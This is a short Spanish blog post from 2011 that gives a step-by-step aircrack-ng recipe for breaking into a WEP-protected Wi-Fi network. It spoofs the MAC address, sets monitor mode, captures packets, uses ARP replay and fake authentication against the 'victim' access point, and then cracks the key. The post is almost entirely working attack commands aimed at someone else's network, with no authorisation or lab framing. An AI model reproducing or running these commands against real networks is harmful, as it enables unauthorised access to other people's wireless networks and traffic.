abrimos una shell
airmon-ng stop eth1
para saber nuestra interfas ponemos esto notra eth1 es la interfas que yo manejo la interfas es la tarjeta que usas
ifconfig eth1 down
macchanger --mac 00:11:22:33:44:55 eth1
para cambiar nuestra mac
airmon-ng start eth1
para activar nuestra tarjeta en modo monitor
airodump-ng eth1
para ver redes al alcance nota copiar la mac el canal y el nombre de la red
airodump-ng --channel x --write pass eth1
esto crea un archivo para poder capturar la red nota en la x sustituir por el canal que esta la red y en donde dice pass pueden poner lo que quieran
aireplay-ng -3 -b (mac de la victima) -h 00:11:22:33:44:55 eth1
ahora esto es para las señales arp cuando tengamos 62,000 arp estara listo
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 eth1
esto se ace para acelerar el proceso en recuperar arp
aircrack-ng pass-01.cap
para sacar la pass,, cuando tengamos 62,000 arp detenemos todas las shell y ponemos esto para encontrar la clave wep y listo
Encotrar claves wep con backtrack
jueves, 9 de junio de 2011
Publicado por JVRINCHES en 13:44 1 comentarios
Suscribirse a:
Entradas (Atom)